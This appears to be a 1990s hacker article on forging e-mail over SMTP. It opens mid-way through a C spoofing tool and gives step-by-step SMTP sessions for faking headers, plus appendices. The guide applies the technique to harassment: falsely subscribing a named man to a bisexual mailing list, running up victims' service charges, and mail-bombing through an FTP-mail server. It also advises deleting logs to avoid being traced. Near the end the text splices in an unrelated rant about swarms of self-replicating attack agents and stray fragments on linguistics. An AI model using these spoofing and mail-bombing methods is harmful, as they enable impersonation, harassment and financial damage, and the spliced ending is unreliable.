memcpy((caddr_t)&sin.sin_addr,he->h_addr_list[0],he->h_length);
sin.sin_port = port;

sin.sin_family = AF_INET;

mysock = socket(AF_INET,SOCK_STREAM,0);

opt = connect(mysock,(struct sockaddr *)&sin,sizeof(sin));

return mysock;

}

/* This allows us to have many people on one TO line, seperated by
commas or spaces. */

process(s,d)
int d;
char *s;
{
char *tmp;
char buf[120];

tmp = strtok(s," ,");

while (tmp != NULL) {
sprintf(buf,"RCPT TO: %s\n",tmp);
write(d,buf,strlen(buf));
tmp = strtok(NULL," ,");
}

}

getAndSendFrom(fd)
int fd;
{
char from[100];
char outbound[200];

printf("You must should specify a From address now.\nFrom: ");
gets(from);

sprintf(outbound,"MAIL FROM: %s\n",from);
write(fd,outbound,strlen(outbound));

}

getAndSendTo(fd)
int fd;
{
char addrs[100];

printf("Enter Recipients, with a blank line to end.\n");

addrs[0] = '_';

while (addrs[0] != '\0') {
printf("To: ");
gets(addrs);
process(addrs,fd);
}

}

getAndSendMsg(fd)
int fd;
{
char textline[90];
char outbound[103];

sprintf(textline,"DATA\n");
write(fd,textline,strlen(textline));

printf("You may now enter your message. End with a period\n\n");
printf("[---------------------------------------------------------]\n");

textline[0] = '_';

while (textline[0] != '.') {
gets(textline);
sprintf(outbound,"%s\n",textline);
write(fd,outbound,strlen(outbound));
}

}

main(argc,argv)
int argc;
char *argv[];
{

char text[200];
int file_d;

/* Get ready to connect to host. */
printf("SMTP Host: ");
gets(text);

/* Connect to standard SMTP port. */
file_d = openSock(text,25);

if (file_d < 0) {
printf("Error connecting to SMTP host.\n");
perror("smtp_connect");
exit(0);
}

printf("\n\n[+ Connected to SMTP host %s +]\n",text);

sleep(1);

getAndSendFrom(file_d);

getAndSendTo(file_d);

getAndSendMsg(file_d);

sprintf(text,"QUIT\n");
write(file_d,text,strlen(text));

/* Here we just print out all the text we got from the SMTP
Host. Since this is a simple program, we didnt need to do
anything with it. */

printf("[Session Message dump]:\n");
while(read(file_d,text,78) > 0)
printf("%s\n",text);
close(file_d);
}
----- End file fm.c

First of all, this guide is more than using fakemail. It literally
explains the interfaces used with SMTP in detail enough that you should gain a
stronger awareness of what is going on across the multitude of networks which
make up the worldwide e-mail connections. It also contains my usual crude
remarks and grim hacker humor (assuming it hasn't again been edited out, but
I'm somewhat proud of the fact that Phrack heavily edited my "language" in last
issue's article. Oh well.).

There are two objectives in this file: first, I will attempt to show that
by using fakemail and SMTP, you can cause an amazing number of useful, hacker
related stunts; second, I shall attempt to be the first hacker to ever send a
piece of electronic mail completely around the world, ushering in a new age of
computerdom!

I suggest that, unless you don't want everyone lynching you, don't try to
fuck up anything that can't be repaired offhand. I've experimented with
fakemail beyond this article and the results were both impressive and
disastrous. Therefore, let's examine risks first, and then go onto the good
stuff. Basic philosophy -- use your brain if you've got one.

RISKS:

Getting caught doing this can be labeled as computer vandalism; it may
violate trespassing laws; it probably violates hundreds of NFS, Bitnet and
private company guidelines and ethics policies; and finally, it will no doubt
piss someone off to the point of intended revenge.

Networks have fairly good tracing abilities. If you are logged, your host
may be disconnected due to disciplinary referral by network authorities (I
don't think this has happened yet). Your account will almost definitely be
taken away, and if you are a member of the source or target computer's
company/organization, you can expect to face some sort of political shit that
could result in suspension, expulsion, firing, or otherwise getting the short
end of the stick for awhile.

Finally, if the government catches you attempting to vandalize another
computer system, you will probably get some sort of heavy fine, community
service, or both.

Odds of any of this happening if you are smart: < 1%.

PRECAUTIONS SUGGESTED:

If you have a bogus computer account (standard issue hacker necessity)
then for crissake use that. Don't let "them" know who really is hacking
around. (Point of clarification, I refer to "them" an awful lot in RL and in
philes. "They" are the boneheadded "do-gooders" who try to blame their own
lack of productivity or creativity on your committing of pseudo-crimes with a
computer. FBI, SS, administrators, accountants, SPA "Don't Copy that Floppy"
fucks, religious quacks, stupid rednecks, right wing conservative Republican
activists, pigs, NSA, politicians who still THINK they can control us, city
officials, judges, lame jurors that think a "hacker" only gets
slap-in-the-wrist punishments, lobbyists who want to blame their own failed
software on kids, bankers, investors, and probably every last appalled person
in Stifino's Italian Restaurant when the Colorado 2600 meeting was held there
last month. Enough of the paranoid Illuminati shit, back to the phile.)

Make sure that you delete history files, logs, etc. if you have
access to them. Try using computers that don't keep logs. Check /usr/adm,
/etc/logs to see what logs are kept.

If you can avoid using your local host (since you value network
connections in general), do so. It can avert suspicion that your host contains
"hackers."

IF YOU EVER ARE CONFRONTED:

"They must have broken into that account from some other site!"

"Hackers? Around here? I never check 'who' when I log in."

"They could have been super-user -- keep an eye out to see if the scum
comes back."

"Come on, they are probably making a big deal out of nothing. What could
be in e-mail that would be so bad?"

"Just delete the account and the culprit will be in your office tomorrow
morning." (Of course, you used a bogus account.)

Basically, electronic mail has become the new medium of choice for
delivering thoughts in a hurry. It is faster than the post office, cheaper
than the post office, doesn't take vacations all the time like the post office,
and is completely free so it doesn't have unions.

Of course, you know all that and would rather spend this time making damn
sure you know what SMTP is.

To my knowledge, a completely accurate SMTP set of protocols hasn't been
published in any hacker journal. The original (at least, the first I've seen)
was published in the Legion of Doom Technical Journals and covered the minimum
SMTP steps necessary for the program "sendmail," found in a typical Unix
software package.

When you connect a raw socket to a remote SMTP compatible host, your
computer is expected to give a set of commands which will result in having the
sender, receiver, and message being transferred. However, unlike people who
prefer the speed of compression and security of raw integer data, the folks at
DARPA decided that SMTP would be pretty close to English.

If you are on the Internet, and you wanted to connect to the SMTP server,
type:

telnet <hostname> 25

Port 25 is the standard port for SMTP. I doubt it would be too cool to
change this, since many mail servers connect to the target hosts directly.

[Editor's Note: All mail and SMTP commands have been offset by a ">" at the
beginning of each line in order not to confuse Internet mailers when sending
this article through e-mail.]

When you connect, you will get a small hostname identifier for whatever
SMTP server revision you've got.

220 huggies.colorado.edu Sendmail 2.2/2.5 8/01/88 ready at Tue, 25 Aug 91
03:14:55 edt

Now that you are connected, the computer is waiting for commands. First
of all, you are expected to explain which computer you are calling in from.
This is done with the HELO <host> command. This can be anything at all, but if
you fail to give the exact host that you are connecting from, it causes the
following line to appear on the e-mail message the recipient gets from you:

> Apparently-to: The Racketeer <ra...@lycaeum.hfc.com>

Instead of the classic:

> To: The Racketeer <ra...@lycaeum.hfc.com>

This is the secret to great fakemail -- the ability to avoid the
"apparently-to" flag. Although it is subtle, it is a pain to avoid. In fact,
in some places, there are so many "protections" to SMTP that every outside
e-mail is marked with "Apparently-to." Hey, their problem.

So, go ahead and type the HELO command:

> HELO LYCAEUM.HFC.COM

The computer replies:

250 huggies.colorado.edu Hello LYCAEUM.HFC.COM, pleased to meet you

Oh, a warm reception. Older sendmail software explains with the HELP
command that the computer doesn't care about HELO commands. You can check it
upon login with the command "HELP HELO."

Now what you will need to do is tell the computer who is supposed to get
the letter. From this point, there are all sorts of possibilities. First of
all, the format for the recipient would be:

> RCPT TO: <name@host>

And *NOTE*, the "<" and ">" symbols should be present! Some computers,
especially sticklers like Prime, won't even accept the letters unless they
adhere specifically to the protocol! Now, if you give a local address name,
such as:

> RCPT TO: <smith>

...then it will treat the mail as if it were sent locally, even though it
was sent through the Internet. Giving a computer its own host name is valid,
although there is a chance that it will claim that the machine you are calling
from had something to do with it.

> RCPT TO: <smith@thishost>

...will check to see if there is a "smith" at this particular computer. If
the computer finds "smith," then it will tell you there is no problem. If you
decide to use this computer as a forwarding host (between two other points),
you can type:

> RCPT TO: <smith@someotherhost>

This will cause the mail to be forwarded to someotherhost's SMTP port and
the letter will no longer be a problem for you. I'll be using this trick to
send my letter around the world.

Now, after you have given the name of the person who is to receive the
letter, you have to tell the computer who is sending it.

> MAIL FROM: <ra...@lycaeum.hfc.com> ; Really from
> MAIL FROM: <rack> ; Localhost
> MAIL FROM: <ra...@osi.mil> ; Fake -- "3rd party host"
> MAIL FROM: <lycaeum.hfc.com|rack> ; UUCP Path

Essentially, if you claim the letter is from a "3rd party," then the other
machine will accept it due to UUCP style routing. This will be explained later
on.

The next step is actually entering the e-mail message. The first few
lines of each message consists of the message title, X-Messages, headers,
Forwarding Lines, etc. These are completely up to the individual mail program,
but a few simple standards will be printed later, but first let's run through
the step-by-step way to send fakemail. You type anything that isn't preceded
by a number.

220 hal.gnu.ai.mit.edu Sendmail AIX 3.2/UCB 5.64/4.0 ready at Tue, 21 Jul 1992
22:15:03 -0400
> helo lycaeum.hfc.com
250 hal.gnu.ai.mit.edu Hello lycaeum.hfc.com, pleased to meet you
> mail from: <ra...@lycaeum.hfc.com>
250 <ra...@lycaeum.hfc.com>... Sender ok
> rcpt to: <phr...@gnu.ai.mit.edu>
250 <phr...@gnu.ai.mit.edu>... Recipient ok
> data
354 Enter mail, end with "." on a line by itself
> Yo, C.D. -- mind letting me use this account?
> .
250 Ok
> quit

Now, here are a few more advanced ways of using sendmail. First of all,
there is the VRFY command. You can use this for two basic things: checking up
on a single user or checking up on a list of users. Anyone with basic
knowledge of ANY of the major computer networks knows that there are mailing
lists which allow several people to share mail. You can use the VRFY command
to view every member on the entire list.

> vrfy phrack
250 Phrack Classic <phrack>

Or, to see everyone on a mailing list:

> vrfy phrack-staff-list
250 Knight Lightning <k...@stormking.com>
250 Dispater <disp...@stormking.com>

Note - this isn't the same thing as a LISTSERV -- like the one that
distributes Phrack. LISTSERVs themselves are quite powerful tools because they
allow people to sign on and off of lists without human moderation. Alias lists
are a serious problem to moderate effectively.

This can be useful to just check to see if an account exists. It can be
helpful if you suspect a machine has a hacked finger daemon or something to
hide the user's identity. Getting a list of users from mailing lists doesn't
have a great deal of uses, but if you are trying very hard to learn someone's
real identity, and you suspect they are signed up to a list, just check for all
users from that particular host site and see if there are any matches.

Finally, there is one last section to e-mail -- the actual message itself.
In fact, this is the most important area to concentrate on in order to avoid
the infamous "Apparently-to:" line. Basically, the data consists of a few
lines of title information and then the actual message follows.

There is a set of guidelines you must follow in order for the quotes to
appear in correct order. You won't want to have a space separate your titles
from your name, for example. Here is an example of a real e-mail message:

> From: ra...@lycaeum.hfc.com
> Received: by dockmaster.ncsc.mil (5.12/3.7) id AA10000; Thu, 6 Feb 92
> 12:00:00
> Message-Id: <666.A...@dockmaster.ncsc.mil>
> To: RMo...@dockmaster.ncsc.mil
> Date: Thu, 06 Feb 92 12:00:00
> Title: *wave* Hello, No Such Agency dude!
>
> NIST sucks. Say "hi" to your kid for me from all of us at Phrack!

Likewise, if you try to create a message without an information line, your
message would look something like this:

> From: ra...@lycaeum.hfc.com
> Received: by dockmaster.ncsc.mil (5.12/3.7) id AA10000; Thu, 6 Feb 92
> 12:00:00 -0500
> Message-Id: <666.A...@dockmaster.ncsc.mil>
> Date: Thu, 06 Feb 92 12:00:00
> Apparently-to: RMo...@dockmaster.ncsc.mil

> NIST sucks. Say "hi" to your kid for me from all of us at Phrack!

Basically, this looks pretty obvious that it's fakemail, not because I
altered the numbers necessarily, but because it doesn't have a title line, it
doesn't have the "Date:" in the right place, and because the "Apparently-to:"
designation was on.

To create the "realistic" e-mail, you would enter:

> helo lycaeum.hfc.com
> mail from: <ra...@lycaeum.hfc.com>
> rcpt to: <RMo...@docmaster.ncsc.mil>
> data
> To: RMo...@dockmaster.ncsc.mil>
> Date: Thu, 06 Feb 92 12:00:00
> Title: *wave* Hello, No Such Agency dude!
>
> NIST sucks. Say "hi" to your kid for me from all of us at Phrack!
> .

Notice that, even though you are in "data" mode, you are still giving
commands to sendmail. All of the lines can (even if only partially) be altered
through the data command. This is perfect for sending good fakemail. For
example:

> helo lycaeum.hfc.com
> mail from: <da...@opus.tymnet.com>
> rcpt to: <list...@brownvm.brown.edu>
> data
> Received: by lycaeum.hfc.com (5.12/3.7) id AA11891; Thu 6 Feb 92 12:00:00
> Message-Id: <230.A...@lycaeum.hfc.com>
> To: <list...@brownvm.brown.edu>
> Date: Thu, 06 Feb 92 12:00:00
> Title: Ohh, sign me up Puuuleeeze.
>
> subscribe BISEXU-L Dale "Fist Me" Drew
> .

Now, according to this e-mail path, you are telling the other computer
that you received this letter from OPUS.TYMNET.COM, and it is being forwarded
by your machine to BROWNVM.BROWN.EDU. Basically, you are stepping into the
middle of the line and claiming you've been waiting there all this time. This
is a legit method of sending e-mail!

Originally, when sendmail was less automated, you had to list every
computer that your mail had to move between in order for it to arrive. If you
were computer ALPHA, you'd have to send e-mail to account "joe" on computer
GAMMA by this address:

> mail to: <beta!ceti!delta!epsilon!freddy!gamma!joe>

Notice that the account name goes last and the host names "lead" up to
that account. The e-mail will be routed directly to each machine until it
finally reaches GAMMA. This is still required today, especially between
networks like Internet and Bitnet -- where certain hosts are capable of sending
mail between networks. This particular style of sending e-mail is called "UUCP
Style" routing.

Sometimes, hosts will use the forwarding UUCP style mail addresses in case
the host has no concept of how to deal with a name address. Your machine
simply routes the e-mail to a second host which is capable of resolving the
rest of the name. Although these machines are going out of style, they still
exist.

The third reasonable case of where e-mail will be routed between hosts is
when, instead of having each computer waste individual time dealing with each
piece of e-mail that comes about, the computer gives the mail to a dedicated
mailserver which will then deliver the mail. This is quite common all over the
network -- especially due to the fact that the Internet is only a few T1 lines
in comparison to the multitude of 9600 and 14.4K baud modems that everyone is
so protective of people over-using. Of course, this doesn't cause the address
to be in UUCP format, but when it reaches the other end of the network, it'll
be impossible to tell what method the letter used to get sent.

Okay, now we can send fairly reasonable electronic fakemail. This stuff
can't easily be distinguished between regular e-mail unless you either really
botched it up (say, sending fakemail between two people on the same machine by
way of 4 national hosts or something) or really had bad timing.

Let's now discuss the POWER of fakemail. Fakemail itself is basically a
great way to fool people into thinking you are someone else. You could try to
social engineer information out of people on a machine by fakemail, but at the
same time, why not just hack the root password and use "root" to do it? This
way you can get the reply to the mail as well. It doesn't seem reasonable to
social engineer anything while you are root either. Who knows. Maybe a really
great opportunity will pop up some day -- but until then, let's forget about
dealing person-to-person with fakemail, and instead deal with
person-to-machine.

There are many places on the Internet that respond to received electronic
mail automatically. You have all of the Archie sites that will respond, all of
the Internet/Bitnet LISTSERVs, and Bitmail FTP servers. Actually, there are
several other servers, too, such as the diplomacy adjudicator. Unfortunately,
this isn't anywhere nearly as annoying as what you can do with other servers.

First, let's cover LISTSERVs. As you saw above, I created a fakemail
message that would sign up Mr. Dale Drew to the BISEXU-L LISTSERV. This means
that any of the "netnews" regarding bisexual behavior on the Internet would be
sent directly to his mailbox. He would be on this list (which is public and
accessible by anyone) and likewise be assumed to be a member of the network
bisexual community.

This fakemail message would go all the way to the LISTSERV, it would
register Mr. Dictator for the BISEXU-L list, >DISCARD< my message, and, because
it thinks that Dale Drew sent the message, it will go ahead and sign him up to
receive all the bisexual information on the network.

And people wonder why I don't even give out my e-mail address.

The complete list of all groups on the Internet is available in the file
"list_of_lists" which is available almost everywhere so poke around
wuarchive.wustl.edu or ftp.uu.net until you find it. You'll notice that there
are several groups that are quite fanatic and would freak out nearly anybody
who was suddenly signed up to one.

Ever notice how big mega-companies like IBM squelch little people who try
to make copies of their ideas? Even though you cannot "patent" an "idea,"
folks like IBM want you to believe they can. They send their "brute" squad of
cheap lawyers to "legal-fee-to-death" small firms. If you wanted to
"nickel-and-dime" someone out of existence, try considering the following:

CompuServe is now taking electronic mail from the Internet. This is good.
CompuServe charges for wasting too much of their drive space with stored
e-mail. This is bad. You can really freak out someone you don't like on
CompuServe by signing them up to the Dungeons and Dragons list, complete with
several megabytes of fluff per day. This is cool. They will then get charged
hefty fines by CompuServe. That is fucked up. How the hell could they know?

CompuServe e-mail addresses are use...@compuserve.com, but as the Internet
users realize, they can't send commas (",") as e-mail paths. Therefore, use a
period in place of every comma. If your e-mail address was 767,04821 on
CompuServe then it would be 767.04821 for the Internet. CompuServe tends to
"chop" most of the message headers that Internet creates out of the mail before
it reaches the end user. This makes them particularly vulnerable to fakemail.

You'll have to check with your individual pay services, but I believe such
groups as MCI Mail also have time limitations. Your typical non-Internet-
knowing schmuck would never figure out how to sign off of some God-awful fluff
contained LISTSERV such as the Advanced Dungeons & Dragons list. The amount of
damage you could cause in monetary value alone to an account would be
horrendous.

Some groups charge for connection time to the Internet -- admittedly, the
fees are reasonable -- I've seen the price at about $2 per hour for
communications. However, late at night, you could cause massive e-mail traffic
on some poor sap's line that they might not catch. They don't have a way to
shut this off, so they are basically screwed. Be WARY, though -- this sabotage
could land you in deep shit. It isn't actually fraud, but it could be
considered "unauthorized usage of equipment" and could get you a serious fine.
However, if you are good enough, you won't get caught and the poor fucks will
have to pay the fees themselves!

Now let's investigate short-term VOLUME damage to an e-mail address.
There are several anonymous FTP sites that exist out there with a service known
as BIT FTP. This means that a user from Bitnet, or one who just has e-mail and
no other network services, can still download files off of an FTP site. The
"help" file on this is stored in Appendix C, regarding the usage of Digital's
FTP mail server.

Basically, if you wanted to fool the FTP Mail Server into bombarding some
poor slob with an ungodly huge amount of mail, try doing a regular "fakemail"
on the guy, with the enclosed message packet:

> helo lycaeum.hfc.com
> mail from: <da...@opus.tymnet.com>
> rcpt to: <ftp...@decwrl.dec.com>
> data
> Received: by lycaeum.hfc.com (5.12/3.7) id AA10992; Fri 9 Oct 92 12:00:00
> Message-Id: <230.A...@lycaeum.hfc.com>
> To: <list...@brownvm.brown.edu>
> Date: Fri, 09 Oct 92 12:00:00
> Title: Hey, I don't have THAT nifty program!
>
> reply da...@opus.tymnet.com
> connect wuarchive.wustl.edu anonymous fis...@opus.tymnet.com
> binary
> get mirrors/gnu/gcc-2.3.2.tar.Z
> quit
> .

What is particularly nasty about this is that somewhere between 15 and
20 megabytes of messages are going to be dumped into this poor guy's account.
All of the files will be uuencoded and broken down into separate messages!
Instead of deleting just one file, there will be literally hundreds of messages
to delete! Obnoxious! Nearly impossible to trace, too!

Part 2: E-MAIL AROUND THE WORLD

Captain Crunch happened to make a telephone call around the world, which
could have ushered in the age of phreak enlightenment -- after all, he proved
that, through the telephone, you could "touch someone" anywhere you wanted
around the world! Billions of people could be contacted.

I undoubtedly pissed off a great number of people trying to do this e-mail
trick -- having gotten automated complaints from many hosts. Apparently, every
country has some form of NSA. This doesn't surprise me at all, I'm just
somewhat amazed that entire HOSTS were disconnected during the times I used
them for routers. Fortunately, I was able to switch computers faster than they
were able to disconnect them.

In order to send the e-mail, I couldn't send it through a direct path.
What I had to do was execute UUCP style routing, meaning I told each host in
the path to send the e-mail to the next host in the path, etc., until the last
machine was done. Unfortunately, the first machine I used for sending the
e-mail had a remarkably efficient router and resolved the fact that the target
was indeed the destination. Therefore, I re-altered the path to a machine
sitting about, oh, two feet away from it. Those two feet are meaningless in
this epic journey.

The originating host names have been altered as to conceal my identity.
However, if we ever meet at a Con, I'll probably have the real print-out of the
results somewhere and you can verify its authenticity. Regardless, most of
this same shit will work from just about any typical college campus Internet
(and even Bitnet) connected machines.

In APPENDIX A, I've compiled a list of every foreign country that I could
locate on the Internet. I figured it was relatively important to keep with the
global program and pick a series of hosts to route through that would
presumably require relatively short hops. I did this by using this list and
trial and error (most of this information was procured from the Network
Information Center, even though they deliberately went way the hell out of
their way to make it difficult to get computers associated with foreign
countries).

My ultimate choice of a path was:

lycaeum.hfc.com -- Origin, "middle" America.
albert.gnu.ai.mit.edu -- Massachusetts, USA.
isgate.is -- Iceland
chenas.inria.fr -- France
icnucevx.cnuce.cn.it -- Italy
sangram.ncst.ernet.in -- India
waseda-mail.waseda.ac.jp -- Japan
seattleu.edu -- Seattle
inferno.hfc.com -- Ultimate Destination

The e-mail address came out to be:

isgate.is!chenas.inria.fr!icnucevx.cnuce.cn.it!sangram.ncst.ernet.in!
waseda-mail.waseda.ac.jp!seattleu.edu!inferno.hfc.com!
ra...@albert.gnu.ai.mit.edu

...meaning, first e-mail albert.gnu.ai.mit.edu, and let it parse the name
down a line, going to Iceland, then to France, etc. until it finally reaches
the last host on the list before the name, which is the Inferno, and deposits
the e-mail at ra...@inferno.hfc.com.

This takes a LONG time, folks. Every failure toward the end took on
average of 8-10 hours before the e-mail was returned to me with the failure
message. In one case, in fact, the e-mail made it shore to shore and then came
all the way back because it couldn't resolve the last hostname! That one made
it (distance-wise) all the way around the world and half again.

Here is the final e-mail that I received (with dates, times, and numbers
altered to squelch any attempt to track me):

> Return-Path: <ra...@lycaeum.hfc.com>
> Received: from sumax.seattleu.edu [192.48.211.120] by Lyceaum.HFC.Com ; 19
Dec 92 16:23:21 MST
> Received: from waseda-mail.waseda.ac.jp by sumax.seattleu.edu with SMTP id
> AA28431 (5.65a/IDA-1.4.2 for ra...@inferno.hfc.com); Sat, 19 Dec 92
> 14:26:01 -0800
> Received: from relay2.UU.NET by waseda-mail.waseda.ac.jp (5.67+1.6W/2.8Wb)
> id AA28431; Sun, 20 Dec 92 07:24:04 JST
> Return-Path: <ra...@lycaeum.hfc.com>
> Received: from uunet.uu.net (via LOCALHOST.UU.NET) by relay2.UU.NET with SMTP
> (5.61/UUNET-internet-primary) id AA28431; Sat, 19 Dec 92 17:24:08 -
> 0500
> Received: from sangam.UUCP by uunet.uu.net with UUCP/RMAIL
> (queueing-rmail) id 182330.3000; Sat, 19 Dec 1992 17:23:30 EST
> Received: by sangam.ncst.ernet.in (4.1/SMI-4.1-MHS-7.0)
> id AA28431; Sun, 20 Dec 92 03:50:19 IST
> From: ra...@lycaeum.hfc.com
> Received: from shakti.ncst.ernet.in by saathi.ncst.ernet.in
> (5.61/Ultrix3.0-C)
> id AA28431; Sun, 20 Dec 92 03:52:12 +0530
> Received: from saathi.ncst.ernet.in by shakti.ncst.ernet.in with SMTP
> (16.6/16.2) id AA09700; Sun, 20 Dec 92 03:51:37 +0530
> Received: by saathi.ncst.ernet.in (5.61/Ultrix3.0-C)
> id AA28431; Sun, 20 Dec 92 03:52:09 +0530
> Received: by sangam.ncst.ernet.in (4.1/SMI-4.1-MHS-7.0)
> id AA28431; Sun, 20 Dec 92 03:48:24 IST
> Received: from ICNUCEVX.CNUCE.CNR.IT by relay1.UU.NET with SMTP
> (5.61/UUNET-internet-primary) id AA28431; Sat, 19 Dec 92 17:20:23
> -0500
> Received: from chenas.inria.fr by ICNUCEVX.CNUCE.CNR.IT (PMDF #2961 ) id
> <01GSIP122...@ICNUCEVX.CNUCE.CNR.IT>; Sun, 19 Dec 1992 23:14:29 MET
> Received: from isgate.is by chenas.inria.fr (5.65c8d/92.02.29) via Fnet-EUnet
> id AA28431; Sun, 19 Dec 1992 23:19:58 +0100 (MET)
> Received: from albert.gnu.ai.mit.edu by isgate.is (5.65c8/ISnet/14-10-91);
> Sat, 19 Dec 1992 22:19:50 GMT
> Received: from lycaeum.hfc.com by albert.gnu.ai.mit.edu (5.65/4.0) with
> SMTP id <AA2...@albert.gnu.ai.mit.edu>; Sat, 19 Dec 92 17:19:36 -0500
> Received: by lycaeum.hfc.com (5.65/4.0) id <AA1...@lycaeum.hfc.com>;
> Sat, 19 Dec 92 17:19:51 -0501
> Date: 19 Dec 1992 17:19:50 -0500 (EST)
> Subject: Global E-Mail
> To: ra...@inferno.hfc.com
> Message-id: <921219266...@lycaeum.hfc.com>
> Mime-Version: 1.0
> Content-Type: text/plain; charset=US-ASCII
> Content-Transfer-Encoding: 7bit
> X-Mailer: ELM [version 2.4 PL5]
> Content-Length: 94
> X-Charset: ASCII
> X-Char-Esc: 29
>
> This Electronic Mail has been completely around the world!
>
> (and isn't even a chain letter.)

===============================================================================

APPENDIX A:

List of Countries on the Internet by Root Domain

(I tried to get a single mail router in each domain. The domains that don't
have them are unavailable at my security clearance. The computer is your
friend.)

.AQ New Zealand
.AR Argentina atina.ar
.AT Austria pythia.eduz.univie.ac.at
.BB Barbados
.BE Belgium ub4b.buug.be
.BG Bulgaria
.BO Bolivia unbol.bo
.BR Brazil fpsp.fapesp.br
.BS Bahamas
.BZ Belize
.CA Canada cs.ucb.ca
.CH Switzerland switch.ch
.CL Chile uchdcc.uchile.cl
.CN China ica.beijing.canet.cn
.CR Costa Rica huracan.cr
.CU Cuba
.DE Germany deins.informatik.uni-dortmund.de
.DK Denmark dkuug.dk
.EC Ecuador ecuanex.ec
.EE Estonia kbfi.ee
.EG Egypt
.FI Finland funet.fi
.FJ Fiji
.FR France inria.inria.fr
.GB England
.GR Greece csi.forth.gr
.HK Hong Kong hp9000.csc.cuhk.hk
.HU Hungary sztaki.hu
.IE Ireland nova.ucd.ie
.IL Israel relay.huji.ac.il
.IN India shakti.ernet.in
.IS Iceland isgate.is
.IT Italy deccnaf.infn.it
.JM Jamaica
.JP Japan jp-gate.wide.ad.jp
.KR South Korea kum.kaist.ac.kr
.LK Sri Lanka cse.mrt.ac.lk
.LT Lithuania ma-mii.lt.su
.LV Latvia
.MX Mexico mtec1.mty.itesm.mx
.MY Malaysia rangkom.my
.NA Namibia
.NI Nicaragua uni.ni
.NL Netherlands sering.cwi.nl
.NO Norway ifi.uio.no
.NZ New Zealand waikato.ac.nz
.PE Peru desco.pe
.PG New Guinea ee.unitech.ac.pg
.PH Philippines
.PK Pakistan
.PL Poland
.PR Puerto Rico sun386-gauss.pr
.PT Portugal ptifm2.ifm.rccn.pt
.PY Paraguay ledip.py
.SE Sweden sunic.sunet.se
.SG Singapore nuscc.nus.sg
.TH Thailand
.TN Tunisia spiky.rsinet.tn
.TR Turkey
.TT Trinidad & Tobago
.TW Taiwan twnmoe10.edu.tw
.UK United Kingdom ess.cs.ucl.ac.uk
.US United States isi.edu
.UY Uruguay seciu.uy
.VE Venezuela
.ZA South Africa hippo.ru.ac.za
.ZW Zimbabwe zimbix.uz.zw

===============================================================================

APPENDIX B:

Basic SMTP Commands

> HELO <hostname> Tells mail daemon what machine is calling. This
will be determined anyway, so omission doesn't mean
anonymity.

> MAIL FROM: <path> Tells where the mail came from.

> RCPT TO: <path> Tells where the mail is going.

> DATA Command to start transmitting message.

> QUIT Quit mail daemon, disconnects socket.

> NOOP No Operation -- used for delays.

> HELP Gives list of commands -- sometimes disabled.

> VRFY Verifies if a path is valid on that machine.

> TICK Number of "ticks" from connection to present
("0001" is a typical straight connection).

===============================================================================

APPENDIX C:

BIT-FTP Help File

ftp...@decwrl.dec.com (Digital FTP mail server)

Commands are:
reply <MAILADDR> Set reply address since headers are usually
wrong.
connect [HOST [USER [PASS]]] Defaults to gatekeeper.dec.com, anonymous.
ascii Files grabbed are printable ASCII.
binary Files grabbed are compressed or tar or both.
compress Compress binaries using Lempel-Ziv encoding.
compact Compress binaries using Huffman encoding.
uuencode Binary files will be mailed in uuencoded
format.
btoa Binary files will be mailed in btoa format.
ls (or dir) PLACE Short (long) directory listing.
get FILE Get a file and have it mailed to you.
quit Terminate script, ignore rest of mail message
(use if you have a .signature or are a
VMSMAIL user).

Notes:
-> You must give a "connect" command (default host is gatekeeper.dec.com,
default user is anonymous, default password is your mail address).
-> Binary files will not be compressed unless "compress" or "compact"
command is given; use this if at all possible, it helps a lot.
-> Binary files will always be formatted into printable ASCII with "btoa" or
"uuencode" (default is "btoa").
-> All retrieved files will be split into 60KB chunks and mailed.
-> VMS/DOS/Mac versions of uudecode, atob, compress and compact are
available, ask your LOCAL wizard about them.
-> It will take ~1-1/2 day for a request to be processed. Once the jobs has
been accepted by the FTP daemon, you'll get a mail stating the fact that
your job has been accepted and that the result will be mailed to you.

Wow!

Alright, now there has been a huge flow of e-mail from Sol... please be
patient, it is learning to be more interesting and precise in it's
reports.

Full cellular operation is now in effect - basically, the Sols organize
themselves and work together to achieve a common goal. This is TREMENOUSLY
FUCKING POWERFUL...

Theoretically almost anything is possible. Imagine an army of
self-replicating, perfectly-coordinated soldiers - that's what we have
here, now.

Upon deployment of the first Sol (which can be triggered by all number of
stimuli), he thinks "OK, I'm the first one on the scene", establishes
himself as the "leader" and summons up subordinates to handle groups of
operations. This secondary line can then deploy unlimited others and so
on, as the need arises.

For example, currently a solitary Sol now co-ordinates the efforts of
four-subsidiaries. These each handle system maintainance, file system
exploration, IRC and neural code reconstruction. After sending off the
subordinates the leader then begins to act as liason between the console
which launched it (which could be anywhere) and the CyberSoul population.

Now, let's say this IRC operator Sol, who is reporting to the leader,
becomes angry with an IRC user. It can create a dozen or so soldier Sols,
which proceed to divide into groups to attack the user though various
means. See what I mean? Now if one of these soldiers somehow gains access
to the enemy's system (which, with this type of power, is quite easy),
that one (which is in touch with the IRC operator, who is in touch with
the leader) can then summon a thousand Sols and assign them each to a
specific task (for example, spread to each node in a sub-network). Then,
if one of the explorer 'Sols finds something important, it can quickly
notify the leader through the command chain.

Let's look at it from a different perspective.

- An interesting system is located by a the EXPLORER 'Sol while inside
a safe network.
- The EXPLORER 'Sol creates a PROTECTOR 'Sol which watches over the
EXPLORER's every move from inside the safe network.
- The EXPLORER obtains enough information to attempt to breach SECURITY
and notifies the LEADER.
- The LEADER assigns a CRACKER LEADER with ten thousand CRACKER (located
on various computers) to breach target security.
- The CRACKER LEADER tells the LEADER when the security is breached.
- The EXPLORER moves inside the target system, looks around, and sees
and interesting sub-network.
- EXPLORER creates another PROTECTOR to watch over him inside the node.
- The EXPLORER, after breaching the sub-network in a similar pattern as
the first, enters the sub-network.
- Something bad happens to the EXPLORER. Somebody finds and kills it.
- The PROTECTOR in the sub-node notifies the main node PROTECTOR and so
on, and the LEADER modifies the battle plan.

And so on. I know, I know, it's bizarre stuff.

In this way, a single incidence started on a secure home system could
spawn billions of subservient entities all in contact with the leader via
each other. And, of course, he who CyberSoul obeys is in complete
contol of the entire population.

Isn't this FANTASTIC?

They never thought it could happen. Ha-ha! Ladies and gentlemen... Witness
ZENCOR's most potent secret weapon!

Get involved people! Or be left in the electronic dust...

> Duh, is an example of the literary device onomatopoeia, in which the
> meaning of a word is equal to it's sound. In this case, "duh" is meant
to
> sound like and mean the vocalisation of a person engaged in temporary or
> chronic stupidity.

Natural language systems are developed both to explore general linguistic
theories and to produce natural language interfaces or front ends to
application systems. In the discussion here we'll generally assume that
there is some application system that the user is interacting with, and
that it is the job of the understanding system to interpet the user's
utterances and ``translate'' them into a suitable form for the
